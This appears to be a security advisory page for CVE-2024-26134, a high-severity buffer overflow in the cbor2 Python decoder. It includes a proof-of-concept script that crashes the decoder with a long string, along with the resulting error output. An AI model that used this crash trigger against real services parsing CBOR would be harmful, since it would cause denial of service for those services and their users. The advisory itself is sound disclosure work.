logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-26134 cbor2

Package

Manager: pip
Name: cbor2
Vulnerable Version: >=5.5.1 <5.6.2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00809 pctl0.73337

Details

Potential buffer overflow in CBOR2 decoder ### Summary Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was **not** able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still) ## Details ### PoC ```py import json import concurrent.futures import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) with concurrent.futures.ProcessPoolExecutor() as executor: future = executor.submit(test) print(future.result()) ``` ``` malloc(): unsorted double linked list corrupted Traceback (most recent call last): File "test.py", line 14, in <module> print(future.result()) File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result return self.__get_result() File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result raise self._exception concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending. ``` If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow. ```py import json import cbor2 def test(): obj = "x" * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc) print(test()) ``` ``` Traceback (most recent call last): File "test.py", line 12, in <module> print(test()) File "test.py", line 9, in test return cbor2.loads(cbor_enc) SystemError: <built-in function loads> returned NULL without setting an error ``` ### Impact An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

Metadata

Created: 2024-02-21T00:09:03Z
Modified: 2025-01-14T15:59:39Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-375g-39jq-vq7m/GHSA-375g-39jq-vq7m.json
CWE IDs: ["CWE-120"]
Alternative ID: GHSA-375g-39jq-vq7m
Finding: F316
Auto approve: 1